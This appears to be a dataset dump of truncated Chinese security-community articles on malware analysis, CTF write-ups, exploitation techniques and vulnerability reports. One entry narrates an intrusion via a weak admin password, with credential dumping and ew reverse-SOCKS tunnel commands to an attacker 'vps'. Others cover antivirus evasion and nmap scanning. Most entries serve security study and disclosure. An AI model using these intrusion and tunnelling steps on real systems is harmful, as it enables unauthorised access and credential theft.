text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
序言
世界上最遥远的距离,不是生与死的距离,而是恰巧有那么一次机会,你却忘记关注它。世界上最遥远的距离,不是生与死的距离,而是我们就在你面前,你却还没关注它。3但是没关系,不管世界多么风云变幻,我们将依然披星戴月,风雨兼程。关注杂术馆,你终将有一天会因为它的存在而自豪。
今天我们跟大家介绍的是QuasarRAT一种快速、轻量级的远程管理工具,使用C#编程的一款远程管理软件。能够提供高稳定性和易于使用的用户界面,QuasarRAT是一款完美的远程管理解决方案。
具备功能
ipv4支持上线压缩(quicklz)和加密(AES-128)通信多线程处理稳定UPnP 支持No-Ip.com 支持浏览网站 (影藏 &
可见)弹出信息狂任务管... | 社区文章 |
# TL;DR
本文的主要重点是原型污染攻击——利益原型污染漏洞可以绕过HTML过滤器。并且我现在绞尽脑汁在思考如何自动化原型污染攻击,从而帮助我解决一些XSS挑战题。
# 原型污染基础
原型污染是JavaScript特有的安全漏洞,源于JavaScript继承模型——基于原型的继承。与C++或Java不同,在JavaScript中创建对象不需要定义类。
const obj = {
prop1: 111,
prop2: 222,
}
该对象有两个属性:pro1和pro2。但这些并不是我们可以访问的唯一属性。调用`obj.toString()`将返回来自原型的"`[object
Object]"... | 社区文章 |
# 前言
从一道CTF来审计学习PHP对象注入,由功能的分析到漏洞的探测、分析和利用。
# 考点
PHP对象注入、代码审计、序列化
# 分析
## 信息收集
题目上来给了一个文件上传的服务,没有直接去测试,对网站进行敏感信息收集,发现存在`robots.txt`泄露
User-agent: *
Disallow: /index.txt
访问`index.txt`获取网站源码
<?php
include('secret.php');
$sandbox_dir = 'sandbox/'.sha1($_SERVER['REMOTE_ADDR']);
global $sandbox_dir;
... | 社区文章 |
作者:[ATN](https://atn.io/ "ATN")
2018年5月11日中午,ATN技术人员收到异常监控报告,显示ATN
Token供应量出现异常,迅速介入后发现Token合约由于存在漏洞受到攻击。本报告描述黑客的攻击操作、利用的合约漏洞以及ATN的应对追踪方法。
#### 攻击:
1. 黑客利用ERC223方法漏洞,获得提权,将自己的地址设为owner
<https://etherscan.io/tx/0x3b7bd618c49e693c92b2d6bfb3a5adeae498d9d170c15fcc79dd374166d28b7b>
2. 黑客在获得owner权限后,发行1100w ATN到自己的攻击主地... | 社区文章 |
# CDN 2021 完全攻击指南 (二)
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
> [CDN 2021
> 完全攻击指南(一)](https://www.anquanke.com/post/id/227818)中主要介绍了当下针对CDN的检测和绕过方法的基本策略,在拜读了清华大学的多篇高纬度的论文后,本篇文章主要从协议层的管制出发,给大家讲述不同的协议规范下,标准和非标准的碰撞,与CDN攻击联系到一起,又会产生怎样的火花?
## HTTP范围放大攻击
范围放大攻击又称 Rangeamp,主要利用了HTTP协议中Range请求头的规范和特性来实现,针对目标网站,我们可以发送一个 HE... | 社区文章 |
# Rotexy银行勒索软件的演变
|
##### 译文声明
本文是翻译文章,文章原作者 securelist,文章来源:securelist.com
原文地址:<https://securelist.com/the-rotexy-mobile-trojan-banker-and-ransomware/88893/>
译文仅供参考,具体内容表达以及含义原文为准。
Rotexy家族的移动木马在2018年8月至10月的三个月内,针对位于俄罗斯的用户发起了70,000多起攻击。
这个银行特洛伊木马家族的一个特征是可以同时接收三个不同来源发起的指令:
1.Google Cloud Messaging(GCM)服务 – 该服务用于通过Goog... | 社区文章 |
作者: **知道创宇404实验室**
#### 0 引子
本文我们将通过一个恶意文档的分析来理解漏洞
CVE-2015-1641([MS15-033](https://technet.microsoft.com/en-us/library/security/ms15-033.aspx))的具体利用过程,以此还原它在现实攻击中的应用。就目前来看,虽然该 Office
漏洞早被修复,但由于其受影响版本多且稳定性良好,相关利用在坊间依旧比较常见,因此作为案例来学习还是很不错的。
#### 1 样本信息
分析中用到的样本信息如下:
SHA256:8bb066160763ba4a0b65ae86d3cfedff8102e2eacbf4... | 社区文章 |
# CAPTCHAS——验证码
你在互联网上看到验证码(CAPTCHAS)已经有十多年了。当尝试登录、注册或在任何地方发表评论时,那些曲折的线条、文字或数字搞得人们比较烦。
CAPTCHAS(或完全自动化的公共图灵测试,用来区分计算机和人类)被设计成一扇门,让人类通过,机器人(程序)被挡在外面。扭曲的线条和摇摆不定的词语现在已经不那么常见了,它们已经被谷歌的reCAPTCHA版本2所取代。这就是CAPTCHA,只要你的人文指数(humanity
quotient)被认为足够高,它就会给你绿色的复选标记。
如果你的得分没有超过谷歌的人类门槛,那么reCAPTCHA又回到了一个类似拼图的挑战,令人惊讶的是,这个挑战实际上比解读几个单词更... | 社区文章 |
# 背景
GlobeImposter勒索病毒家族从2017年出现,持续活跃到现在,先后出现过V1.0和V2.0两个版本。最近该勒索病毒又更新了,虽然其整体代码框架变化不大,只做了些局部修改,我们也勉强将其称为V3.0版本。该版本仍然采用RSA和AES两种加密算法的结合,病毒本身也未添加横向传播渗透的能力。
相较之前版本,该版本对RSA公钥和加密文件后缀采用了加密处理,且将加密文件的后缀改成.动物名称+4444的样子,如:.Horse4444,还会将中招用户的ID信息保存在C:\Users\public\路径下,文件名是其对应RSA公钥的SHA256的值。当加密完成后,除了之前已有的清除远程桌面登录信息,还添加了自删除的功能。
目前该... | 社区文章 |
# Heap Safari-线程本地缓存
|
##### 译文声明
本文是翻译文章,文章原作者 _py ,文章来源:0x00sec.org
原文地址:<https://0x00sec.org/t/heap-safari-thread-local-caching/5054/1>
译文仅供参考,具体内容表达以及含义原文为准。
## 介绍
在今天这篇文章中,我们将跟大家讨论关于堆(Heap)利用方面的内容。实际上,我们近期还对刚刚更新的glibc堆分配器((pt)malloc)进行了研究/逆向分析,我们在这篇文章中也会跟大家介绍这方面的内容,因为网上目前还没有很多相关资料。我之所以要不断强调glibc,是因为在实际场景中,不同平台下(li... | 社区文章 |
# TUTK软件供应链漏洞分析报告:影响全球多家摄像头厂商
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 漏洞背景
### 概述
近日,360安全大脑监测到 Nozomi 实验室披露了 ThroughTek 公司的 P2P 软件开发套件 (SDK)
中的一个严重漏洞(CVE-2021-32934)[1],CVSS v3评分为9.1分。该 P2P SDK 用于支持通过 Internet
提供对音频/视频流的远程访问,目前被多个安全摄像头和智能设备厂商采用,是许多消费级安全摄像头和物联网设备原始设备制造商 (OEM) 供应链的一部分。
此后 ThroughTek 公司给出了漏洞影响的SDK版本... | 社区文章 |
# 肚脑虫组织(APT-C-35)移动端攻击活动揭露
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
传统的APT攻击主要是针对PC端进行,而随着智能手机和移动网络在世界范围内的普及发展,越来越多黑客组织的攻击目标也迅速蔓延到移动端,甚至出现出和PC端结合的趋势。近几年被国内外安全厂商陆续披露的Fancy
Bear、Lazarus、Operation
Manul、摩诃草、黄金鼠等多个攻击组织无疑印证了这点。近期,360烽火实验室发现肚脑虫组织(APT-C-35)最新的攻击已把移动端也加入到其攻击目标中。
肚脑虫组织(APT-C-35,
后文统称肚脑虫组织),又称Donot,是一个针对克什米尔地区相... | 社区文章 |
作者:白帽汇安全研究院@kejaly
校对:白帽汇安全研究院@r4v3zn
## 前言
Apache Skywalking
是分布式系统的应用程序性能监视工具,特别是为微服务,云原生和基于容器(Docker,Kubernetes,Mesos)的体系结构而设计的。
近日,Apache Skywalking 官方发布安全更新,修复了 Apache Skywalking 远程代码执行漏洞。
Skywalking
历史上存在两次SQL注入漏洞,CVE-2020-9483、CVE-2020-13921。此次漏洞(Skywalking小于v8.4.0)是由于之前两次SQL注入漏洞修复并不完善,仍存在一处SQL注入漏洞。结合
h2 数据库(默认的... | 社区文章 |
# C3P0反序列化链浅析
## 0x0 前言
关于C3P0反序列化链也许被很多人忽视了,网上与此相关的分析相对而言也较少,给人一种第一眼鸡肋的感觉,但是笔者有过切身经历,通过Fuzz的手段利用这个链打成功了某个站点。本文则是笔者学习此链的一些体会。
## 0x1 依赖
安装 ysoserial
git clone https://github.com/frohoff/ysoserial.git
cd ysoserial
mvn clean package -DskipTests
通过帮助信息,查看C3P0
java -jar ysoserial-0.0.6-SNAPSHOT-all.jar
可以看到... | 社区文章 |
# 针对WhatsApp、Telegram及Signal应用的侧信道攻击技术研究
##### 译文声明
本文是翻译文章,文章原作者 talosintelligence,文章来源:blog.talosintelligence.com
原文地址:<https://blog.talosintelligence.com/2018/12/secureim.html>
译文仅供参考,具体内容表达以及含义原文为准。
## 一、前言
从互联网诞生以来,消息应用就一直伴随我们左右。然而最近一段时间,由于一些国家开始实施大规模监控策略,有更多的用户选择安装名为“安全即时通信应用”的端到端加密应用。这些应用声称可以加密用户的邮件、保护用户数据免受第三方... | 社区文章 |
前段时间参加了WCTF2020比赛,当时主要是通过盲测的方式找到了正确的payload,但是对于网上出现的多种payload形式并不了解其原因,因此有了这篇文章。根据网上出现的payload以及比赛中用到的payload,主要有以下3种。
__${xxx}__::.x
__${xxx}__::
__${xxx}__::x.
Thymeleaf这道题采用的环境是Spring+Thymeleaf,当web应用基于spring,Thymeleaf使用SpEL,否则使用OGNL。
## Thymeleaf 预处理
Thymeleaf模版引擎有一个特性叫做表达式预处理(Expression
PreProcessing)... | 社区文章 |
# Windows 10 Task Scheduler服务DLL注入漏洞分析
## 0x00 前言
最近我一直在逆向分析某款反病毒解决方案,在逆向过程中,我发现Windows 10 Task
Scheduler(计划任务)服务会寻找某个不存在的DLL,因此存在DLL劫持/注入漏洞。如果攻击者可以向`PATH`环境变量指定的目录中写入恶意DLL,那么就可以利用这种方式实现常驻及本地提权。此外,这种技术也可以用来绕过UAC。
## 0x01 DLL劫持
Task
Scheduler服务会使用相对名称来加载某个程序库,因此存在DLL劫持风险。当Windows系统上的应用或者服务启动时,为了能正常工作,这些应用或服务会按照一定的顺序来搜索需... | 社区文章 |
# 说明
本文的所有技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他,请在24小时内删除工具文件!!!
`未经本人同意,禁止转载!(尤其是未经授权,禁止搬运至微信公众号!!!)`
## 免杀效果
**静态免杀**
**动态免杀效果(指的是可执行命令)**
# 1\. 准备条件
本文中的免杀方式在我写好之后,免杀可能就已经失效了(`当师傅读到这个文章的时候,大概率已经失效了`),所以仅供各... | 社区文章 |
### 站点信息
弱口令yyds
后台登录通过部署包getshell
各位看shell应该就知道是什么应用了
通过信息收集发现
外网 x.x.x.x
内网 192.168.10.36
system权限 3389开启
没有waf
直接掏出cs
可以正常上线,并且成功读取密码
上传代理,进内网看看
E:\ew_for_Win.exe -s rssocks -d vps -e 33333
./ew_for_linux64 -s rcsocks -l 22222 -e 33333 &
登录远程桌面(没必要)
全是外语,看不懂,操作不了,只能从shell里执行命令
通过发现还有不少内网i... | 社区文章 |
有朋友在问关于端口重定向的问题,所以为了更直观的表达,我把实现代码放出来,大家参考一下
Windows下,在应用层启动的只要没有设置SO_EXCLUSIVEADDRUSE,不管是谁先启动,监听哪个地址,都是可以复用的,你可以用192.168.1.1(本机IP),127.0.0.1,127.0.0.2,127.x.x.x,IPv6等,都是可以的
以下代码仅限于Windows下
端口重定向:
#include "winsock.h"
#include "windows.h"
#include "stdio.h"
#include "stdlib.h"
#pragma comment(lib,"ws... | 社区文章 |
原文地址:[《"BLIND" Reversing - A Look At The Blind iOS
App》](https://exceptionlevelone.blogspot.tw/2017/10/blind-reversing.html
"《"BLIND" Reversing - A Look At The Blind iOS App》")
译者:hello1900@知道创宇404实验室
#### 前言
[“Blind是一款用于工作场合的匿名社区应用。” ](https://us.teamblind.com/about
"“Blind是一款用于工作场合的匿名社区应用。”
")换句话说,作为一名员工,如果有“畅所欲言”或... | 社区文章 |
最近做题遇到一些静态编译的elf,一般这种静态编译的程序函数都是成千上百个的,如果一个个看肯定头皮发麻,我们通常是挑重点抓大头来解题
但是作为一个强迫症,看着一堆没有符号的函数:subxxxx()真的是不爽,就在网上查了一波学习了一下遇到这种情况该如何把静态编译并且strip后的程序的符号给找回来
IDA中提供了一个东西做FLIRT:库文件快速识别与鉴定技术(Fast Library Identification and Recognition
Technology)
简单的说,这玩意,能通过一个静态链接库的签名文件,来快速识别被去符号的程序中的函数,从而为函数找到符号
那么怎么样操作呢?
首先你得有这个静态链接库的签名文件
IDA... | 社区文章 |
# CVE-2020-1938 : Tomcat-Ajp 协议漏洞分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
作者:Hu3sky@360CERT
## 0x01 漏洞背景
2020年02月20日, 360CERT 监测发现 国家信息安全漏洞共享平台(CNVD) 收录了 CNVD-2020-10487 Apache
Tomcat文件包含漏洞
Tomcat是由Apache软件基金会属下Jakarta项目开发的Servlet容器,按照Sun
Microsystems提供的技术规范,实现了对Servlet和JavaServer
Page(JSP)的支持。由于Tomcat本身也内含了HTTP服务器... | 社区文章 |
# 基于IOCTLBF框架编写的驱动漏洞挖掘工具KDRIVER FUZZER
##### 译文声明
本文是翻译文章,文章原作者 k0shl,文章来源:whereisk0shl.top
原文地址:<https://whereisk0shl.top/post/2018-01-30>
译文仅供参考,具体内容表达以及含义原文为准。
> 作者:k0shl;
>
> 作者博客:https://whereisk0shl.topioctlbf;
>
> 项目地址:https://github.com/koutto/ioctlbfkDriver Fuzzer;
>
> 项目地址:https://github.com/k0keoyo/kDriver-F... | 社区文章 |
# Magento Commerce XSS漏洞分析
|
##### 译文声明
本文是翻译文章,文章原作者 Fortinet,文章来源:fortinet.com
原文地址:<https://www.fortinet.com/blog/threat-research/magento-commerce-widget-form--core--xss-vulnerability.html>
译文仅供参考,具体内容表达以及含义原文为准。
## 一、前言
虽然电子商务为我们提供了更加便利的生活,但也面临来自互联网上越来越多的安全威胁。根据[Alexa top
1M](https://www.datanyze.com/market-share/e... | 社区文章 |
# 【技术分享】通过WordPress的自动更新功能一次性入侵互联网27%的网站
|
##### 译文声明
本文是翻译文章,文章来源:wordfence
原文地址:<https://www.wordfence.com/blog/2016/11/hacking-27-web-via-wordpress-auto-update/>
译文仅供参考,具体内容表达以及含义原文为准。
****
**翻译:**[ **WisFree**](http://bobao.360.cn/member/contribute?uid=2606963099)
**稿费:300RMB(不服你也来投稿啊!)**
******投稿方式:发送邮件至**[ **linw... | 社区文章 |
# 3月27日安全热点 - 网络犯罪团伙领导人造成自动取款机吐钱
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 资讯类
MacOS 10.13.1又爆两个漏洞 可查看明文密码及访问加密硬盘
<http://toutiao.secjia.com/macos10-13-1-flaws>
FTC调查Facebook是否违反了隐私协议
<http://www.zdnet.com/article/ftc-to-probe-if-facebook-privacy-violations-broke-settlement/>
客户聚焦:坦普尔大学通过TAM服务降低攻击面
<https://research... | 社区文章 |
**作者:[evilpan](https://evilpan.com/)
原文链接: <https://mp.weixin.qq.com/s/Ojm3LSw8q8H5pAT-JxUyqA>**
本文是 2020
年中旬对于蓝牙技术栈安全研究的笔记,主要针对传统蓝牙和低功耗蓝牙在协议层和软件安全性上攻击面分析,并介绍了一些影响较大的蓝牙漏洞原理,比如协议层的
KNOB、BIAS 漏洞,软件实现上的 BlueBorne、SweynTooth 以及 BlueFrag 漏洞等。
# 前言
蓝牙(Bluetooth)是一个短距离无线传输的技术,工作在免证的ISM频段。最初名字为Wibree,在90年代由Nokia设计开发,随后转交给蓝牙特... | 社区文章 |
一、报告要点
1、黑灰产业的发展从最早期的纯刷人气,刷粉丝,刷赞模式转向纯粹的为刷量和解决刷量的存在业务模式。
2、黑灰产的从业门槛逐渐降低,从最早期的专供上游工具,已经流向中下游。
3、2018年上半年刷量任务的需求主要依靠最火的自建站点模式完成刷量任务。
4、刷量相关群成员大多以工作室命名。同时工作室的数量也远高于去年。
5、账号售卖产业链成本正仍在增加。
6、新一代的改机工具,不仅价格低于早期,同时集成了代理IP+虚拟定位的功能。
7、同去年相比,产业链模式无明显变换,更多的是工具功能的开发,如改机工具新增的虚拟定位。
8、账号注册成本的降低,接码平台的曝光。越来越多的黑灰产入门人员开始涉入号商角色... | 社区文章 |
# Apache Synapse 远程代码执行漏洞(CVE–2017–15708)预警
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x00 背景
Apache Synapse 是一个简单、轻量级的高性能企业服务总线 (ESB),它是在 Apache Software Foundation 的
Apache License Version 2.0 下发布的。使用 Apache Synapse,您可以通过 HTTP、HTTPS、Java™
Message Service (JMS)、简单邮件传输协议 (SMTP)、邮局协议版本 3
(POP3)、FTP、文件系统和许多其他传输介质筛选、转换... | 社区文章 |
# 如何滥用LAPS窃取用户凭据
|
##### 译文声明
本文是翻译文章,文章原作者 akijosberryblog,文章来源:akijosberryblog.wordpress.com
原文地址:<https://akijosberryblog.wordpress.com/2019/01/01/malicious-use-of-microsoft-laps/>
译文仅供参考,具体内容表达以及含义原文为准。
## 一、LAPS简介
[LAPS](https://technet.microsoft.com/en-us/mt227395.aspx)(Local Administrator
Password
Solution,本地管理员... | 社区文章 |
**作者:三米前有蕉皮**
**原文链接:<https://www.cnblogs.com/Kali-Team/p/12589630.html>**
## 前言
接着上几个视频都是演示添加用户的,然后突然想起Metasploit里面的添加用户是调用命令行的,我就想能不能把它改为调用API的,给Metasploit[提交了一点点代码](https://github.com/rapid7/metasploit-framework/pull/12988),这些都是我用过之后得到的一些函数,所以不一定全都是对的,而且存在对某一个知识领域不是很了解,可能会有地方讲错,请大家指正。
## 结构
### 文件结构
1. **externa... | 社区文章 |
## 何为dll注入
DLL注入技术,一般来讲是向一个正在运行的进程插入/注入代码的过程。我们注入的代码以动态链接库(DLL)的形式存在。DLL文件在运行时将按需加载(类似于UNIX系统中的共享库(share
object,扩展名为.so))。然而实际上,我们可以以其他的多种形式注入代码(正如恶意软件中所常见的,任意PE文件,shellcode代码/程序集等)。
## 全局钩子注入
在Windows大部分应用都是基于消息机制,他们都拥有一个消息过程函数,根据不同消息完成不同功能,windows通过钩子机制来截获和监视系统中的这些消息。一般钩子分局部钩子与全局钩子,局部钩子一般用于某个线程,而全局钩子一般通过dll文件实现相应的钩子函... | 社区文章 |
# Windows调试艺术——从真实病毒学习消息机制
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
要阅读本文章的小伙伴建议先看看《windows调试艺术》的这两篇文章来了解一下前置知识
[Windows调试艺术——从0开始的异常处理(下)](https://www.anquanke.com/post/id/175753)
[Windows调试艺术——从0开始的异常处理(上)](https://www.anquanke.com/post/id/175293)
之前的时候偶然在某网站拿到一款很简单的病毒程序,虽然分析的难度不高,但是它巧妙的利用了Windows的消息机制实现了恶意功能,正好可以用... | 社区文章 |
原文:<https://noxxi.de/research/mime-5-easy-steps-to-bypass-av.html>
**引言**
* * *
传统上,邮件内容仅能使用ASCII字符,并且每行字符数量也有限制,即1000个。[MIME标准](http://en.wikipedia.org/wiki/MIME
"MIME标准")定义了一种使邮件结构化(多个部分,包括附件)的方法,并且允许使用非ASCII数据。不幸的是,由于该标准太复杂,同时也太过灵活,使得某些定义可能会相互冲突,最要命的是,它也没有定义真正意义上的错误处理方法。
其结果是,面对某些打擦边球的有效MIME或故意使其无效的MIME,对于不同的实现来说,其解... | 社区文章 |
# CSRF攻击技术浅析
### CSRF(Cross-site request forgery)
跨站请求伪造,由客户端发起,是一种劫持受信任用户向服务器发送非预期请求的攻击方式,与XSS相似,但比XSS更难防范,常与XSS一起配合攻击
### 原理详解
攻击者盗用了你的身份信息,以你的名义发送恶意请求,对服务器来说这个请求是你发起的,却完成了攻击者所期望的一个操作
### 漏洞危害
修改用户信息,修改密码,以你的名义发送邮件、发消息、盗取你的账号等
### 攻击条件
1. 用户已登录存在CSRF漏洞的网站
2. 用户需要被诱导打开攻击者构造的恶意网站
### 攻击过程
实体 | 对象
---|---
用户 | U... | 社区文章 |
Author:[索马里的海贼@i春秋](http://bbs.ichunqiu.com/thread-13977-1-1.html?from=seebug)
### 前言
上一回(http://bbs.ichunqiu.com/thread-13714-1-1.html
)说到快速漏洞挖掘中的几个重点关注对象,命令执行,文件操作,sql注入。并且拿sql做为例子简单做了一次代码审计,今天换一个思路,从文件操作部分入手,毕竟
文件操作一个搞不好就是getshell,比起注入按部就班慢慢来可要爽快多了。
### 一、关注重点
对于文件操作部分来说,首先对php内置的文件操作函数的作用和特性要有一个大概的了解
> file_get_con... | 社区文章 |
# 两种姿势批量解密恶意驱动中的上百条字串
##### 译文声明
本文是翻译文章,文章原作者 信口杂谈,文章来源:JiaYu
原文地址:<https://mp.weixin.qq.com/s/w1H6iqldtHKjuM5QTU5cPQ>
译文仅供参考,具体内容表达以及含义原文为准。
作者:JiaYu 转自公众号:[信口杂谈](https://mp.weixin.qq.com/s/w1H6iqldtHKjuM5QTU5cPQ)
## 1\. 概述
在 360Netlab 的旧文
《[“双枪”木马的基础设施更新及相应传播方式的分析](https://mp.weixin.qq.com/s/KHa5GyCvbZwXruv0uK6weA)》... | 社区文章 |
Author: **janes(知道创宇404实验室)** Date: 2017-03-15
## 背景介绍
Struts2官方于北京时间2017年3月6号晚上10点公布Struts2存在远程代码执行的漏洞(漏洞编号S2-045,CVE编号:CVE-2017-5638),并定级为高危漏洞。由于该漏洞影响范围广(Struts
2.3.5 - Struts 2.3.31, Struts 2.5 - Struts
2.5.10),漏洞危害程度严重,可直接获取应用系统所在服务器的控制权限,并且3月7日早上互联网上就流出了该漏洞的PoC和Exp,因此,S2-045漏洞在互联网上的影响迅速扩大,受到了互联网公司和政府的高度重视。距漏洞公布到现在... | 社区文章 |
**前言**
通过信息收集,收集网站可能存在的漏洞,然后进行漏洞复现,攻击外网服务器,从而获取外网服务器的权限,进而对服务器进行提权、留后门等操作。
**信息收集:**
`Nmap -sP 10.10.10.0/24`
对10.10.10.10.0网段进行收集,收集存活的主机ip
`nmap -sT- O 10.10.10.128`
对该ip进行端口的枚举爆破
收集网站的路径目录信息
利用椰树对网站进行一个漏洞扫描(目录信息收集)
利用AWVS扫描器对网站进行一个全面的扫描,收集信息
**漏洞利用**
找到了存在sql注入漏洞的页面 <http://10.10.10.128/se3reTd... | 社区文章 |
# CVE-2020-0605:.NET处理XPS文件时的命令执行
## 1\. 译文声明
本文是翻译文章,原作者 Soroush Dalili
原文地址:<https://www.mdsec.co.uk/2020/05/analysis-of-cve-2020-0605-code-execution-using-xps-files-in-net/>
译文仅作参考,具体内容表达请见原文
## 2\. 前言
微软近期修复了许多与XPS文件有关的反序列化漏洞,其中就包括[`CVE-2020-0605`](https://portal.msrc.microsoft.com/en-us/security-guidance/advis... | 社区文章 |
# Apache Solr反序列化远程代码执行漏洞分析(CVE-2019-0192)
|
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 0x01 漏洞描述
Solr
是Apache软件基金会开源的搜索引擎框架,其中定义的ConfigAPI允许设置任意的jmx.serviceUrl,它将创建一个新的JMXConnectorServerFactory工厂类实例对象,并通过对目标RMI
/ LDAP服务器的’bind’操作触发调用。
远程恶意RMI服务器可以响应任意的对象,Solr端使用java中ObjectInputStream类将接收到的对象进行不安全的反序列化过程。使用ysoserial工... | 社区文章 |
# WebLogic安全研究报告
##### 译文声明
本文是翻译文章,文章原作者 奇安信 CERT,文章来源:奇安信 CERT
原文地址:<https://mp.weixin.qq.com/s/qxkV_7MZVhUYYq5QGcwCtQ>
译文仅供参考,具体内容表达以及含义原文为准。
可能是你能找到的最详细的WebLogic安全相关中文文档
## 序
从我还未涉足安全领域起,就知道WebLogic的漏洞总会在安全圈内变成热点话题。WebLogic爆出新漏洞的时候一定会在朋友圈刷屏。在从事安全行业之后,跟了几个WebLogic漏洞,写了一些分析,也尝试挖掘新漏洞和绕过补丁。但因为能力有限,还需要对WebLogic,以及Java反序... | 社区文章 |
当我们接到某个项目的时候,它已经是被入侵了。甚至已经被脱库,或残留后门等持续攻击洗库。
**后渗透攻击者的本质是什么?**
阻止防御者信息搜集,销毁行程记录,隐藏存留文件。
**防御者的本质是什么?**
寻找遗留信息,发现攻击轨迹与样本残留并且阻断再次攻击。
那么这里攻击者就要引入“持续攻击”,防御者就要引入“溯源取证与清理遗留”,攻击与持续攻击的分水岭是就是后渗透持续攻击,而表现形式其中之一就是后门。
**后门的种类:**
本地后门:如系统后门,这里指的是装机后自带的某功能或者自带软件后门
本地拓展后门:如iis 6的isapi,iis7的 模块后门
第三方后门:如apache,serv-u,第三方... | 社区文章 |
# 基于深度学习的恶意样本行为检测(含源码)
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
作者:ApplePig@360云影实验室
## 0x01 前言
目前的恶意样本检测方法可以分为两大类:静态检测和动态检测。静态检测是指并不实际运行样本,而是直接根据二进制样本或相应的反汇编代码进行分析,此类方法容易受到变形、加壳、隐藏等方式的干扰。动态检测是指将样本在沙箱等环境中运行,根据样本对操作系统的资源调度情况进行分析。现有的动态行为检测都是基于规则对行为进行打分,分值的高低代表恶意程度的高低,但是无法给出类别定义。本文采用CNN深度学习算法对Cuckoo沙箱的动态行为日志进行检测和分类尝试,分别测... | 社区文章 |
# 驱动人生旗下应用分发恶意代码事件分析 - 一个供应链攻击的案例
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 概述
2018年12月14日下午,360互联网安全中心监测到
“驱动人生”系列软件“人生日历”等升级程序分发恶意代码的活动,其中包括信息收集及挖矿木马,甚至还下发了利用永恒之蓝漏洞进行内网传播的程序。360核心安全事业部已经对相关的恶意代码做了分析,可以参看参考链接。
360威胁情报中心对本次事件做了进一步的分析,基于收集到的事实确认这是一起通过控制应用相关的升级服务器执行的典型的供应链攻击案例,360威胁情报中心以前发布过一个介绍供应链攻击的报告,可以参看阅读原文的链接。以下... | 社区文章 |
### 一、前言
本文包括两个方面的漏洞安全介绍,第一部分我将以`Fomo3D`合约为原型,讲述一下由于合约的打包机制而导致的真实环境中的漏洞。第二个方面我会根据以太坊的特性,对漏洞的成因进行详细的分析。
### 二、Fomo3D事件攻击
#### 1 Fomo3D介绍
在介绍漏洞之前,我们先简单的介绍一下Fomo3D是什么。
在我看来,Fomo3D的设计者是在深刻研究过博弈和人的贪婪性之后而设计的游戏。Fomo3D 是一款直接在以太坊网络上运行的分散式,无信任的区块链游戏。
该游戏由智能合约精心编程和部署,本身完全去中心化,不受任何人控制,它将自动运行直到以太坊网络死亡,无论底池有多么诱人,只会根据游戏规则进行支付。下面就是这个游... | 社区文章 |
# 梨子带你刷burpsuite靶场系列之高级漏洞篇 - Web缓存投毒专题
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 本系列介绍
>
> PortSwigger是信息安全从业者必备工具burpsuite的发行商,作为网络空间安全的领导者,他们为信息安全初学者提供了一个在线的网络安全学院(也称练兵场),在讲解相关漏洞的同时还配套了相关的在线靶场供初学者练习,本系列旨在以梨子这个初学者视角出发对学习该学院内容及靶场练习进行全程记录并为其他初学者提供学习参考,希望能对初学者们有所帮助。
## 梨子有话说
>
> 梨子也算是Web安全初学者,所以本系列文章中难免出现各种各样的低级错误,还请... | 社区文章 |
上一篇:【独家】php一句话后门过狗姿势万千之后门构造与隐藏【一】
既然木马已就绪,那么想要利用木马,必然有一个数据传输的过程,数据提交是必须的,数据返回一般也会有的,除非执行特殊命令。
当我们用普通菜刀连接后门时,数据时如何提交的,狗狗又是如何识别的,下面结合一个实例,用通俗易懂的方式来演示数据提交层直接过狗原理。
本文意义:纵使网上有很多修改菜刀过狗的方法,但是我都看了下,局限性比较大,而且不太系统,新人学了可能会只是其一不知其二
### 环境:
域名与服务器均为个人真实所有。
服务器开启网站安全狗+服务器安全狗,引擎全部开启,最高防护级别。
### 对比环境:
服务器:apache+php5.3;本地:nginx+... | 社区文章 |
# Java 8u20反序列化漏洞分析
##### 译文声明
本文是翻译文章
译文仅供参考,具体内容表达以及含义原文为准。
## 一、前言
在`JDK7u21`中反序列化漏洞修补方式是在`AnnotationInvocationHandler`类对type属性做了校验,原来的payload就会执行失败,在8u20中使用`BeanContextSupport`类对这个修补方式进行了绕过。
## 二、Java序列化过程及数据分析
在8u20的POC中需要直接操作序列化文件结构,需要对Java序列化数据写入过程、数据结构和数据格式有所了解。
先看一段代码
import java.io.Serializable;
publi... | 社区文章 |
“第五空间”网络安全线下赛PWN部分WRITEUP
最近参加了“第五空间”网络安全线下赛,这次比赛以PWN为主,有几个比较典型的基础题。当时比赛的远程libc不方便加载调试,本人用本地libc进行复盘,写了一份writeup。
## 壹業
程序保护全开,应该用one_gadget获得shell。
标准的菜单题,有add、show、edit、delete功能,漏洞位于delete函数,是一个Use After Free漏洞:
第一步:先创建unsortedbin大小的chunk,free掉,然后再show,就能泄露libc地址。
第二步:free掉0x71大小的chunk,篡改此chunk的fd指针到malloc_ho... | 社区文章 |
# RealWorld CTF 2020/21 BoxEscape漏洞复现
# 前言
今年2月份RealWorld
CTF出了两道虚拟机逃逸的题目,之前没有接触过VirtualBox所以当时并没有研究。由于原题涉及的主机和虚拟机都是windows平台,源码编译和驱动编写似乎比较麻烦,所以我决定在linux平台搭建对应的环境并复现了比赛题目所涉及的逃逸漏洞。后面有空的话自己再进一步实现windows平台下的移植,有兴趣的可以参考Sauercl0ud所给出的关于原题的writeup,见文末链接。
本文所使用的环境如下,主机:linuxmint-20.1-cinnamon-64bit.iso,虚拟机:linuxmint-20.1-cinn... | 社区文章 |
**1、弱口令扫描提权进服务器**
**首先ipconfig自己的ip** 为10.10.12.* ***** ,得知要扫描的网段为10.10.0.1-10.10.19.555
